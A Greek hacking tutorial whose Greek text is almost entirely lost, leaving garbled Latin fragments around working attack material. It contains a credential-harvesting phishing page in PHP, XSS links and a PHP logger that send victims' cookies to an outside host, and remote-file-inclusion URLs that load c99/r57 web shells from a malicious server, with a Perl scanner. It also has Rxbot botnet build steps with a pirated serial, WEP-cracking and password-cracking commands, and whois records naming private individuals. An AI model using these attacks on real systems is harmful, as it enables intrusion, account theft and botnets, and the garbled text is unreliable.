You are on page 1of 70

tutorial hacking

Computer Science is no more about computers than astronomy is about telescopes


Edsger W. Dijkstra

by Thanasaras!

Hacker;
, ,
,
, -
ARPAnet .
'hacker'. hackers
internet. hackers Unix
. hackers
Usenet. hackers .
,
hacker, hacker.

hacker
hacker .
hacker , - ,
.
hackers
'hackers' -
hacker
hackers.
hacker .
hackers,
. ( )

(Black Hat Hackers). hackers
'crackers'
. hackers
crackers , , ,
hacker,

. ,
'hacker'
'crackers'.
hackers.

: hackers ,
crackers .
, 'cracking'
.

'hacker', ,
'' .
Eric Steven Raymond

hacker,
1960, 1980 .
.
!
.
hackers phonefreaks.

.
. http://www.youtube.com/watch?v=u18BAZjUHhE .
hacker,
hacking.

5 hackers

hackers

.
.
1. Kevin Mitnick
Mitnick acker.
..
"
...".
Hol ywood
, Takedown Freedom
Downtime. Mitnick ""
Los Angeles
.

Digital Equipment Corporation
software.
Mitnick , ,
.

hacker, Tsutomu Shimomura. Moitnick

, .
2. Adrian Lamo
Lamo hackers
"" Microsoft New York Times.
Lamo internet
,
" hacker".
Lamo , ahoo!, Citigroup, Bank of
America Cingular, White Hat Hackers

Lamo
New
York Times. Lamo
.

3. Jonathan James
16 James,
.
. James
""

e-mail. James
NASA software
1,7 . . James
.
4. Robert Tappan Morris
Morris NSA Morris
worm. To worm -
. worm
internet. Morris
Cornel
internet .
worm
Morris
400 . o Morris
MIT Computer Science
.
5. Kevin Poulsen
, Dark Dante, Kevin Poulsen

KISS-FM Los Angeles
Porsche. FBI
Poulsen
.

.
,
Wired News.
hackers ..

hackers
!

hackers,
hackers 3 :

Grey Hat Hackers


Grey hat hackers ""
,

"". Anonymous,
Greek Hacking Scene.
Black Hat Hackers

, .
, .
hackers,
, .

White Hat Hackers


, ,
.
,
. .
,
. (
. .).

Hacker.
hacker, "" ,

. , Hacker
.

. ,

URL
. Acunetix vulnerability scanner.
,
,
Hacker,
"", .
SQL Injection ( ) Havij 1.15.

Hacking:

O
hacker.
Python. Eric
Steven Raymond Python , ,
.
, .
projects. Python
tutorial
site Python.
tutorials, Youtube(http://www.youtube.com/watch?
v=4Mf0h3HphEA).
hacker Perl,
C( C++) Lisp'',
Python. HTML
.

Browser (). html
.
html .

Hacking: Unix

.
hacking,
Linux . ,
Unix.
-
.
hacking Microsoft Windows
,
.
Unix Internet.
, "
Windows.
, ,
Windows, .
Internet
Unix, Internet hacker Unix.
, hacker
Unix. ( ,
hackers ,
Unix Internet
Microsoft .)
, linux multitasking,

.
ubuntu (
ubuntu linux).
dvd
boot tray (CD/DVD Drive). ,

Linux.

,
.
.
Journal ext 3 ( )
SWAP ( )
P/C
.
- ,

root.

.
, 45 1h:15
, P/C, DVD
.

user ,
().

Deface
Deface
.
Deface (Greek Hacking Scene -GHS),
, ,
.
Passwords -
,
site .
hacker
.

Password Cracking
Social Engineering
.
,


.
.

.

" ",

.
:

hacker .

-hacker: < > , <


> software service.

.
()
?!
.
hacker
.
Dictionary Attacks hacker
(wordlist)
.
Hydra.
Hydra,
.
ftp(File Transfer Protocol) server
server (..Ftp.tripod.com), (.. Ftp,
) ( 21).

Passwords,

.

.
Start
password.
Start
,

.
Brute-force Attacks

. Brute-force ,
( ),
( )
.

John the Ripper ( )
password cracker, Unix-like,
Windows, BeOs OpenVMS. John The Ripper
"" password
, "" . ,
password
. ""
password !

-
,
GNU/linux i686.
1. directory Shel
,
. $ cd /var/tmp
2. John The Ripper
. $ wget http://www.openwal .com/john/b/john-1.6.tar.gz
3. John The Ripper
. $ tar xzvpf john-1.6.tar.gz
4. directory "" John The Ripper
. $ cd john-1.6/src
5. root
. $ su
...
. # make linux-x86-mmx-elf
( ubuntu-, 5 sudo make
linux-x86-
mmx-elf!)
6. directory
. # cd . /run/

hash
/etc/passwd /etc/shadow passwords.
....
# ./unshadow /etc/passwd /etc/shadow > passwords
, , bruteforce
.
...
# ./john passwords

.
# ./john
...
user "test"! password "secret"!
John The Ripper password

.
1. # adduser test
2. # passwd test [secret]
3. # ./unshadow /etc/passwd /etc/shadow > passwords
4. # ./john -i:alpha passwords
Loaded 4 passwords with 4 different salts...........
password "secret" user
"test"!

"" CTRL+C.

# ./john -restore
, ""
password ...
# ./john -show passwords
test:secret:502:502: /home/test:/bin/bash
1 password cracked, 3 left
""
# userdel test

Rainbow Tables ' rainbow table Hash


. Hash

.
hash ( ) .
hash
MD5 web sites.
site,
MD5 hash site.
site hash
MD5 hash
site, , site
.
hash, hash

brute-force dictionary.
.
rainbow table cracking
Windows Password Hacking.

Domain names
""
domain names.
.
Facebook, ""
Facebook.com( 15 ).
Facebook domain name .com top level domain
tld. Internet Assigned Numbers Authority (IANA)
top-level domains top level domain
tld( ).
,
2 . .. .gr, .fr, .cn, .tr, .co.uk(. ) .
top level domains tld top level domain tld
cc.
2 .
( 3 ) . gov , .org , .mil , .com ...
top level domain gTLD.
top-level domains,
arpa.
blogs. blogs
. H
mysite.gr, blogs
.

mysite.blogspot.com.
blogspot.com. blogs
, "" .
hackers blog
. ""
blog
, HTML.

Defaces. blogs
"powerade by google", Google .
"" blog,
Google.

Phishing hacking
Phishing.

hackers
.
rapidshare.com .
site http://www.rapidshare.com
premium zone.
.
.
: method action.
(ctrl+F) method.
method=post post
get.
action
:
action=https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi
next.php :
action=next.php
index.html
next.php.

:
:

<?php
$datum = date(d-m-Y / H:i:s);
$ip = $_SERVER['REMOTE_ADDR'];
header(Location: redirect url);
$handle = fopen(password.txt, a);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, =);
fwrite($handle, $value);
fwrite($handle, \r\n);
}
fwrite($handle, IP: $ip | Date: $datum (Date=0 GTM)\r\n);
fwrite($handle, \r\n);
fclose($handle);
setcookie (user, empty, time()+3600);
exit;
?>

next.php

.
location redirect url
rapidshare

.
rapishare. :
header(Location: https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi );
next.php
password.txt

.
free web hosting site php (
http://www.freeweb7.com/)
default web hosting provider
index.html 3
(index.html,next.php,password.txt).
test
login test password
password.txt.
.
...
- Cain and Abel ( ).
- SolarWinds
- Rainbow Crack ( , GB
).
- Brutus ( FTP).

Network Hacking
Footprinting
.


.
?
;

.
:
,emails,,
.
.
.


.
Domain Names Network Blocks;
Domain Names
IP's .
:
query whois
register domains.
www.ripe.net
5 queries
whois
. queries : registrar query,o organizational
query, domain query, network query point of contact query.
:

www.networksolutions.com
query whois
site domain MARFININVESTMENTGROUP.COM
:
Domain Name: MARFININVESTMENTGROUP.COM
Registrar: ONLINENIC, INC.
Whois Server: whois.onlinenic.com
Referral URL: http://www.OnlineNIC.com
Name Server: NS.MARFINBANK.GR
Name Server: NS1.MARFINGROUP.GR
Status: clientTransferProhibited
Updated Date: 26-feb-2011
Creation Date: 10-may-2007
Expiration Date: 10-may-2010

:

. IP
.
www.ripe.net :
inetnum: 195.97.15.0 - 195.97.15.127
netname: MARFIN
descr: Marfin Investments
descr: Kifissias 225-227, Athens, 14561
country: GR
admin-c: KV138-RIPE
tech-c: HOL-RIPE
status: ASSIGNED PA
mnt-by: AS3329-MNT
source: RIPE # Filtered
role: HOL Network Operations Center
address: Hel as On Line S.A.
address: 2, Andrianiou Str & Papada
address: 11521 Ampelokipoi, Athens, Greece
abuse-mailbox: abuse@hol.gr
abuse-mailbox: postmaster@hol.gr
admin-c: TK583-RIPE
admin-c: AI1568-RIPE
tech-c: TK583-RIPE
tech-c: AI1568-RIPE
nic-hdl: HOL-RIPE
mnt-by: AS3329-MNT
source: RIPE # Filtered
person: Kostas Vlahakis
address: Marfin Investments
address: Kifissias 225-227
address: Athens 14561, Greece
phone: +301 6127748
fax-no: +301 6127353
nic-hdl: KV138-RIPE
mnt-by: AS3329-MNT
source: RIPE # Filtered
Information related to '62.103.38.112 - 62.103.38.127'
inetnum: 62.103.38.112 - 62.103.38.127
netname: MARFIN
descr: ATHENS
country: GR
admin-c: MH6673-RIPE
tech-c: IT454-RIPE
status: assigned PA
mnt-by: OTENET-GR-MNT
source: RIPE # Filtered
person: MARFIC HELLENIC
address: ATHENS
address: GR
phone: +30-8173000
mnt-by: otenet-gr-mnt
nic-hdl: MH6673-RIPE
source: RIPE # Filtered
person: Ioanna Tsagka
address: Network Operation and Management Center - NOMC
address: OTEnet S.A.
address: 109 Kifissias Ave & Sina Str. Marousi
address: GR-15124 Athens
address: Greece
phone: +30 210 6151600
fax-no: +30 210 6151900
nic-hdl: IT454-RIPE
source: RIPE # Filtered
Information related to '213.5.232.80 - 213.5.232.83'
inetnum: 213.5.232.80 - 213.5.232.83
netname: marfin
descr: Bank
country: GR
admin-c: AM2251-RIPE
tech-c: AM2251-RIPE
status: ASSIGNED PA
mnt-by: AS8509-MNT
source: RIPE # Filtered
person: Aris Metaxwtos
address: 45 Vas.Sofias av
address: 10676 - Athens
phone: +30-10-8170617
fax-no: +30-10-6180079
nic-hdl: AM2251-RIPE
mnt-by: AS8509-MNT
source: RIPE # Filtered

,,fax,
network blocks!!! tool
IP
alive. nslookup cmd
hostnames IP
.
Footprinting
.

.

Port Scanning hacker


( 90%) ports
.
, ""
,
. nmap
(Zenmap).
hacker (URL IP)
target box. command box .
hacker profile scan.
hacker scan
.

scan :
(H IP 50.22.11.20, eimaimalakas.com)

NetBIOS Hacking.
port 139,
netbios hacking.
. angry IP scanner ,

.
, ,
. ;
tools>preferences>ports
.
, (
.)

,
, .
,
139 ,
. 139
! !
cmd(command). cmd
enter, :

1): nbtstat -a (here the ip)

2) : net view \\(IP here)

3) : net use R: \\(IP here)\C

; 90% ( )
" "(Win+E) (!)
. (C:/) !!
ports ,
ports.
20 FTP data (File Transfer Protocol)
21 FTP (File Transfer Protocol)
22 SSH (Secure Shel )
23 Telnet
25 SMTP (Send Mail Transfer Protocol)
43 whois
53 DNS (Domain Name Service)
68 DHCP (Dynamic Host Control Protocol)
80 HTTP (HyperText Transfer Protocol)
110 POP3 (Post Office Protocol, version 3)
137 NetBIOS-ns
138 NetBIOS-dgm
139 NetBIOS
143 IMAP (Internet Message Access Protocol)
161 SNMP (Simple Network Management Protocol)
194 IRC (Internet Relay Chat)
220 IMAP3 (Internet Message Access Protocol 3)
443 SSL (Secure Socket Layer)
445 SMB (NetBIOS over TCP)
1352 Lotus Notes
1433 Microsoft SQL Server
1521 Oracle SQL
2049 NFS (Network File System)
3306 MYSQL
4000 ICQ
5800 VNC
5900 VNC
8080 HTTP

ports hacker
,
nMap
, .
"site" 404 error
site
error. 404
error (ghfhgfhfh.php)
. .. Www.target-site.com/ghfhgfhfh.php
nMap

(http://nmap.org/book/man.html)

Searching for Vulnerabilites hacker


,
exploit. exploit
.
exploit port
.
databases exploits :
http://exploit-db.com/
http://packetstormsecurity.org/
http://osvdb.org/
0-Day: Vulnerability () hacker
0-day (zero day). 0-day Vulnerabilites
hacker
site
.

Adobe Rader,
, hacker
.
vulnerabilites :

1. Denial Of Service (DoS)


-
bandwidth
.
(data packets)
-
(reboot).
. .
.
,
enter.
.
, .
,
; ,
( ),
, !
DDoS (Distributed denial of service), ,

.

2. Buffer Overflow (BoF)


hackers
login.
.
,

.
,

(buffer) ,
.

process stack,
.
(function)
,
prcess stack
,
( root access).

3. Local Exploit exploit Local,


exploit.
4. Remote Exploit exploit remote,

(
RFI{Remote File Inclusion}).
Penetrating , hacker
exploit ?!

exploit . exploit
.
exploit Perl.

exploit , Perl.
sudo apt-get instal perl .
exploit
IP . '
exploit,
directory ,
cd /directory exploit/
.. Cd /home/Desktop/ exploit
perl --exploit.pl
. exploit
, pl Perl.

Wireless Hacking
Wep Cracking Backtrack.
. iwconfig
(
eth1) ,
. , BackTrack,
Radio Network Analysis, 80211, Al ,
Kismet.
kismet monitor, ,
...
s c
channel . m
( !!).
L ( L . shift+L) kismet
. enter ssid, bssid channel.
q , Q kismet.
,
airodump-ng eth1 --ivs -w capture --bssid ff:ff:ff:ff:ff:f1 --channel 1
enter, eth1 iwconfig, ff:ff:ff:ff:ff:f1
bssid kismet, (channel) 1
kismet, capture
, airodump-ng ... --ivs
(capture.ivs) -w, ""
P bssid ff:ff:ff:ff:ff:f1, .
64bit 50k 200k ,
128bit 200k 700k!! ,
. .
. airodump-ng,
, aireplay-ng eth1 -a ff:ff:ff:ff:ff:f1
--deauth 0 enter eth1 iwconfig,
ff:ff:ff:ff:ff:f1 bssid kismet,
aireplay-ng ... --deauth 0 AP clients.

. -c ff:ff:ff:ff:ff:f2
--deauth, ff:ff:ff:ff:ff:f2 mac client ( kismet),
0 .
,
clients . ctrl+c
deauth. , aireplay-ng eth1 -b ff:ff:ff:ff:ff:f1 -m 68 - n 68 -h
ff:ff:ff:ff:ff:ff --arpreplay ff:ff:ff:ff:ff:f1 bssid
kismet, :
( capture), AP
,
, , .
"(got 1 ARP requests), sent ##
packets...". airodump .
airplay airodump .
... ,
aircrack-ng -f 2 -b ff:ff:ff:ff:ff:f1 -n 128 -q capture*.ivs enter
ff:ff:ff:ff:ff:f1 bssid kismet,
, 128 bit (64/128/256/512), capture
airodump.
airocrack-ng -f 2,
airodump . aircrack
. linux,
airodump, aircrack, aireplay kismet .
.
? WPA . WPA ,
passphrase , s1g@mhnm3vre1p0t3k@n3n45p4p4r@5

. , how to.
,
ivs, brute force ,
, .
youtube
http://www.youtube.com/watch?v=owazIVWp-rc .

Packet Sniffing
.
Wireshark. packet sniffer hacker
, username password
. Wireshark.
capture interfaces.

start.

Windows Live Messange


.

Windows Hacking
Ophcrack, Ophcrack.
Load Encrypted SAM
,
windows.
system32 config
.../WINDOWS/system32/config.
config
Ophcrack windows
Hash.
Administrator NT
Hash ( ).


Hash, hash.
)
(
) )
online server Hash.
, site
o hash
(http://www.md5decrypter.co.uk/ntlm-decrypt.aspx).
hash )

.

hash site (http://www.md5decrypter.co.uk/contact-
me.aspx) rainbow tables.
: O ADMIN
...

Malware
Malware,
malicious software,

. (
) , .

Virus
.
, , .
,
. ,
o ,
, (
-
).

Trojan horse( ) Backdoor


, ,
backdoor. ,
, - ,
,
.

Worm

. ,
.

Spyware

.
spyware,
, (
usernames passwords sites), ,
, keyloggers.
, keyloggers,
RAT(Remote Administrator Tool),
.
Cybergate, ProRAT, DarkComet.
Adwares


, .
bandwidth internet,
,
.

Crypters
"" ()
(antivirus)
.

Botnet botnet
. botnet bots


.
botnet
.
H botnet
keyloging, capture screen
shots, , cd keys,
, ddos ,
, botnet
.
. C
compiler
1.K Mcft Visual C 6.0 Standard edition
http://anonym.to/?http://www.megaupload.com/?d=SUHPYZRX

http://anonym.to/?http://rapidshare.com/files/21861555/msc__.rar.html
: itzforblitz
Serial: 812-2224558
2. setup.exe .
3. Service Pack 6
http://anonym.to/?http://www.microsoft.com/downloads/details.aspx ?
familyid=a8494edb-2e89-4676-a16a-5c5477cb9713&displaylang=en
4. Windows Platform SDK
http://anonym.to/?http://rapidshare.com/files/21854411/sdk.rar.html

http://anonym.to/?http://www.megaupload.com/?d=YH3SS78I
: itzforblitz

/bot .
1. Mcft Visual C Compiler 6.0
2. tools-> options directories
3. directories,
.
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDE
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\LIB
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\SRC
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BIN
C:\Program Files\Microsoft Visual Studio\VC98\INCLUDE
C:\Program Files\Microsoft Visual Studio\VC98\MFC\INCLUDE
C:\Program Files\Microsoft Visual Studio\VC98\ATL\INCLUDE

bot .
http://anonym.to/?http://www.mediafire.com/?awmwyidzjz5

http://anonym.to/?
http://rapidshare.com/files/21854222/botsrc7.6rx.rar.html
2.
folder : Rxbot 7.6
3. Rxbot 7.6 config.h
. :
int port = ; //server port
char password[] = " "; // bot, '' ''
char server[] = " "; // irc botnet
char channel[] = "# "; // bots
char chanpass[] = " "; // .
bot
char exploitchan[] = "# "; // exploit

char keylogchan[] = "# "; // keylog

char psniffchan[] = "# "; // psniff

config file
. ; !!!
1. Mcft Visual 6.0
2. File -> Open Workspace
3. browse Rxbot 7.6 folder rbot.dsw
4. ''rbot files'' -> build
( )

5.O Rbot.exe Rxbot 7.6 > Debug folder !


!!!! !!!
botakia
irc !
bots. .
.
http://anonym.to/?http://rapidshare.com/files/21542921/cmands.html
mirc irc
:
http://mirc.com/
T tutorial
bots ,
botnet public

botnet . bots
secret mode. key.
m ,
moderated, flood server .

botnet , torrents
trackers mininova piratebay,
chatrooms, , internet cafe, warez
,
. public
botnet dalnet, undernet, efnet.

!

Web Hacking
Cross Site Scripting (xss)
(2-3 ) XSS
, , ' ,
webbased , web
developers ..
,
. ,
XSS attacks
.
XSS attacks;
CSS (Cross-Site Scripting)
attacker (inject)
.
, , '
.

client server,
server, client side
scripts javascript Netscape.

XSS .
Xss (Cross Site Scripting),
site
.
(http://tinyurl.com/yxzaoj ). , ,
,
XSS.
. ,
, , . , ,
: , security experts
XSS . , sites
XSS ,
.
;
.
,

.
XSS, ,
site
. , , .
, ,
site .

: internet
stateless. .. . ;
browser server, ( server)
! (build-in)

.
, :
site. ;
, nick password server
. . . ..

. . Ok.. !
site ,
(nick password)
,
links server .
,
link server,
! stateless,
( )
server (http://tinyurl.com/fwghj).
, , server , -
, (nick password)
( ..
);
.
forum.
server.
, ! server
, ,
stateless; ;
,.. .. PC !
cookies , .
, ,
internet browser ,
sites, server .
. . ,
( ), , ;
.. ! ( !!). , sites forums,
server
. ,
,
, server
. cookies session cookies,
. . ,
internet browser session.
.. ,
cookies browser: ,
site !
(impersonation). .
site
impersonation.
cookies ()
.

cookies
PC .
;
.
XSS. , o
java (javascript) internet browser,
site .
;

. , site
1
. ,
javascript
server. javascript, (
)
Hel o Total Hacker.
:

<script>alert(Hel oTotalHacker!!);</script>

server
. ( )
server ,
.
:

2: To server
XSS.
javascript .
cookies user,...
. :
<script>alert(document.cookie)</script>

cookies server ( 3).
.
cookies. , ,
( , )
javascript URL.
:
>
internet browser ,
cookies .
cookies
... ! A
( cookies ) 2
:
1: PC
.
2: cookies
,
!

3: cookies server.
1
.
: phishing
(http://tinyurl.com/48zm2). url
link . ,

... : ... ...
! URL mail link
server .
,
.
!
.
... (
... !!).
URL link
cookies (
2).
javascript XSS (
) link (redirection).
XSS
redirection. 2:
redirection. link site
cookies :
http://to.8yma.com/results?kAndEntire=%3Cscript%3Edocument.location%3D
%22http
%3A%2F%2Fkapa.freevar.com%2Ftests%2Fkakoscript1.php%3Fparam%3D
%22+
%2B+document.cookie%3B%3C%2Fscript
%3E+&searchType=results&network=&networkView=main
redirection.
link (
Microsft;;;). link
( link Microsoft) ,
. javascript.
javascript
Link Microsoft.
. link -
Microsoft:
http://to.8yma.com/results?kAndEntire=%3Ca+href%3D%22http%3A%2F
%2Fwww.microsoft.com%22+onmouseover%3D%22javascript
%3Adocument.images
%5B1%5D.src%3D%27http%3A%2F%2Fkapa.freevar.com%2Ftests
%2Fkakoscript2.php%3Fparam1%3D%27%2Bdocument.cookie%2B
%27%26param2%3D%27%2Bnavigator.userAgent%3B%22%3EMicrosoft%3C
%2Fa
%3E+&searchType=results&network=&networkView=main
2 ( ... )
4. kakoscript1.php kakoscript2.php.
!! .
(.. kakoscript2.php):
1: document.cookie ( !
).
2: navigator.userAgent ( internet browser
).
URL
site .
, , mail link

4. link
Microsoft. link
cookies , ... !

site link
site ( cookies).

4: ... link Microsoft.


2 o
!
server php. server
Free Web Hosting .
server, ,
kakoscript1.php kakoscript2.php.
kakoscript2 1. To
script cookie
internet browser ( server)
aaa.txt.
<?php
$biskotaki = $HTTP_GET_VARS["param1"]; // T. . .
$browser = $HTTP_GET_VARS["param2"]; // T
browser.
$txtfile = fopen('aaa.txt', 'a+'); // .
fwrite($txtfile, "-- biskotaki --------\n"); //
fwrite($txtfile, $biskotaki . "\n"); // .
fwrite($txtfile, $browser . "\n");
fwrite($txtfile, "------------------\n");
fclose($txtfile); // .
?> // ... !!
!
site :
site.
link ,
cookies Internet browser .
cookies
cookies ( )
site ! ,
impersonation
!! ! .
.
aaa.txt :
5: cookies.
5 session cookie.
cookies, site
! cookie
add-on firefox Web Developer Toolbar
(http://tinyurl.com/2ek6ec) ( 6)

6: cookies Web Developer


Toolbar.
... .
Opera firefox .
, site
( session cookie) browser
.
. add-on firefox User Agent Switcher
(http://tinyurl.com/48zm2)
browser ( 7).

7: User Agent Switcher


browser .
,
server, refresh ... voila
( 8)!
8: O .

... login!

, .
.
:
link .
( ) ,
. antiphishing (
IE7 buildin).
javascript. AddIn
firefox NoScript (http://tinyurl.com/yov7ar)
anti-XSS MUST!!
, internet browsers.
cookies
..., Links.
clear cookies
link.
passwords , e-
mails.
mail PIN
! e-mails
(
http://www.dart.gov.gr/)
mail.
server. O


( ) !
site .
sites
.
XSS
,
. ,
(
;;!)
.
,

!
!!

(client side) '
. phising,

XSS .

XSS attacks:
, :
+ Type-0
phising XSS,
email attached link
javascript
attacker.
+ Type-1
, attacker vulnerable XSS site
script spoofed email link
site script url. link
script.
+ Type-2
site forum, post link site
link url "" session
cookies site/forum
attacker.

LFI: !
,

( , ),
. ,
: , ,
. , ,
.
, , ,
,
. .
!

Remote File Inclusion (R.F.I)


deface root ,
(vulnerability).
R.F.I.
php (script) site
.
:
(
) include($title . '/archive.php'); url:
www.vulnerable.website.com/index.php?title=archive.php ?

php script ,
( permissions)
. T scripts web shel s. T
web shel s : c99 r57.
O :
www.vulnerable.website.com/index.php?
title=http://www.malicious.code.com/C99.txt?
archive.php
C99.txt
remote web server.
server :
www.malicious.code.com.
server
R.F.I.
& remote
.
site,
,
scanners, , ,
bots IRC Servers.
Remote File Inclusion. Remote File Inclusion
( RFI)
,
..
()!
RFI (Remote File Inclusion),
/ site PHP/ASP
shel , ( ) server. To site-,

, .
, 99.9878129% ,
!

, Remote File Inclusion..


.. ()
, ( )

!
RFI?
RFI [Remote File Inclusion] () ,
, ( )
PHP (
) website '
. site?
,
URL website. ,
, URL site
.. Shel .
Shel ?
Shel ( WebShel ) php ,asp ( Dynamic
Pages) .
site, add, edit, delete, upload .
.. ADMINISTRATOR!
RFI
? : include($page . '.php');
include () .php . :) .
site :
http://www.site.gr/i...age=example.php
. .
example.php URL
site ( ) Shel
. H include () , ,
. . voila!
http://www.site.gr/index.php?page=http://w...hel s/shel .php
( ) shel ,
*.*txt
site ! http://www.site.gr/index.php?
page=http://www.eimai_polu_kakos.gr/shel s/shel .txt ?
.
( )... !!
site
RFI ,

1

site shel aki site
. 1 shel
server! , server
( ),
Free Host shel aki ..
Google Free Hosts ..!
1
shel aki server ,
! So evil eh?
2 ()
website
. To !
(Google)
, ?

..
:
/sources/functions.php?CONFIG[main_path]=
/sources/template.php?CONFIG[main_path]=
/embed/day.php?path=
/includes/dbal.php?eqdkp_root_path=
/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=
/includes/kb_constants.php?module_root_path=
/mcf.php?content=
/components/com_facileforms/facileforms.frame.php?ff_compath=
skins/advanced/advanced1.php?pluginpath[0]=
/zipndownload.php?PP_PATH=
/administrator/components/com_serverstat/install.serverstat.php?
mosConfig_absolute_path=
/components/com_zoom/includes/database.php?mosConfig_absolute_path=
/main.php?sayfa=
/indexmain.php?page=
/components/com_extended_registration/registration_detailed.inc.php?
mosConfig_absolute_path=
/addpost_newpoll.php?addpoll=preview&thispath=
/header.php?abspath=
/components/com_performs/performs.php?mosConfig_absolute_path=
/administrator/components/com_remository/admin.remository.php?
mosConfig_absolute_path=
/impex/ImpExData.php?systempath=
/modules/vwar/admin/admin.php?vwar_root=
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=
/administrator/components/com_remository/admin.remository.php?
mosConfig_absolute_path=
/tools/send_reminders.php?includedir= allinurl:day.php?date=
/skin/zero_vote/error.php?dir=
/modules/TotalCalendar/about.php?inc_dir=
index.php?page=
/tags.php?BBCodeFile=
index.php?pageurl=
/templates/headline_temp.php?nst_inc=
:
Vulnerbale sites Google al inurl:
!
website

( ).. '
site
RFI... .....
2
.

3
website RFI
o :
site:
http://www.site.gr/i...age=example.php
example.php
server , shel , 1.
2
, site
shel aki ,
! 2,
, ( site ),
' ,
: Read, Write,
Execute Command Upload, Download, Edit, Delete ... .
,

( perl !) , site

RFI.
single_rfi.pl

1.#!/usr/bin/perl
2.
3.use LWP::UserAgent;
4.use HTTP::Request;
5.
6.print "\n(c) totalXaker magazine \n";
7.print "Simple RFI Vulnerability Scanner [mr.pr0n]\n";
8.print "Host: ";
9.print "[Ex: www.xxx.org ]:";
10.chop ($host = <STDIN>);
11.$host = "http://".$host if ($host !~ /^http:/);
12.print "Enter path:";
13.print "[Ex: xxx.php?xxx= ]:";
14.chop ($path = <STDIN>);
15.print "Shell: ";
16.print "[Ex: http://www.xxx.gr/xxxx/r57.txt? ]:";
17.chop ($shell = <STDIN>);
18.print "String: ";
19.print "[Ex: r57shell ]:";
20.chop ($string = <STDIN>);
21.{
22.$rfi=$host."/".$path.$shell;
23.$req=HTTP::Request->new(GET=>$rfi);
24.$useragent=LWP::UserAgent->new();
25.$response=$useragent->request($req);
26.if ($response->is_success) {
27. if( $response->content =~ /$string/){
28.print "$host ,is HACKABLE! :D \n";
29.print "-------------------------------------------------\n";
30.print "$rfi";
31.print "\n-------------------------------------------------\n";
32.}else{
33.print "Maybe $host is not Vulnerable!:( \n";
34.}
35.}}

:
1-5 2,3
packages . LWP::
UserAgent packages
User Agent ( )

Web. HTTP::Request http
.

6-20 6,7 .

' , ,
$host site:
http://www.site.gr
$path,
: /index.php?page=
, $shel
,
shel .
, $string ""
($host) ,
shel r57.txt ( )
r57shel shel !
21-25
H $rfi=$host."/".$path.$shel
.
23-25
, website
online! 26-35
(response) o

$string. ..
!
:

(c) totalXaker magazine


Simple RFI Vulnerability Scanner [mr.pr0n]
Host: [Ex: www.xxx.org ]:http://www.site.gr
Enter path:[Ex: xxx.php?xxx= ]:/index.php?page=
Shell: [Ex:
http://www.xxx.gr/shells/r57.txt?]:http://www.eimai_polu_kakos.gr/shells/r57.txt
?
String: [Ex: r57shell ]:r57shell
HACKABLE! :D
-------------------------------------------------
http://www.site.gr/index.php?page=http://www.eimai_polu_kakos.gr/shells/r57.txt ?
-------------------------------------------------
, .
3
. site HACKABLE ..
.

3
.. !
( ?)
site .. !

4
site , shel
- shel .
:
shel server
directory ,
default_page.php. access
site ' , administrator :)
, 4.

4
server shel ' !
administrator site,
site. ! dministrators (
uid=99(nobody)) !(! !)

Defacement site
..
defacement
, ..
,
site! To Defacement 5
( !)
!.
SQL Injection
.
( ) SQL.
, SQL URL
! .
SQL Injection.
SQL Injection.
.
.
Blind SQL Injection, Ms SQL Injection, My SQL
Injection .
mysite.gr/article.php?id=5

, .php?id=.
,
cojito, .

Part 1: google dorks


http://rapidshare.com/files/262434175/el hnikoxak_part_1.rar
Part 2: database MySQL 5
http://rapidshare.com/files/262440280/el hnikoxak_part_2.rar
Part 3: database MySQL 4
http://rapidshare.com/files/262475910/el hnikoxak_part_3.rar
Part 4: admin>Deface
http://rapidshare.com/files/262616856/el hnikoxak_part_4.rar
Part 5: database ASP MySQL injection
https://rapidshare.com/files/4270670079/__database__ASP_MySQL_injection
-part_5-.mp4
Part 6: database blind MySQL injection
https://rapidshare.com/files/326535758/__database__blind_MySQL_injection-
part_6-.mp4

: , 90%
Hashes, MD5, SHA-256 .
Hashes;

http://www.md5decrypter.co.uk/ .
. cain&abel,
. bruteforce,
dictionary rainbow tablets.
(http://www.oxid.it/cain.html).
youtube.
Note: win xp /win 7 2 .

IP Internet.
proxy browser
Internet .
proxy server
.

.
cookies
, .
Web Based Proxy:
http://proxify.com/
http://htmlblock.co.uk/anonymous_web_browser/
http://www.shadowsurf.com/
http://anonymouse.org/anonwww.html
http://www.guardster.com/subscription/proxy_free.php
http://www.the-cloak.com/login.html
Web Based Proxy

,
proxy
.

...

"hacks" ,
.

Greektrack ""
,
Hacking.
Hacking , ,
, , , .

"" C4pt4in.
.

C4pl4in

!!!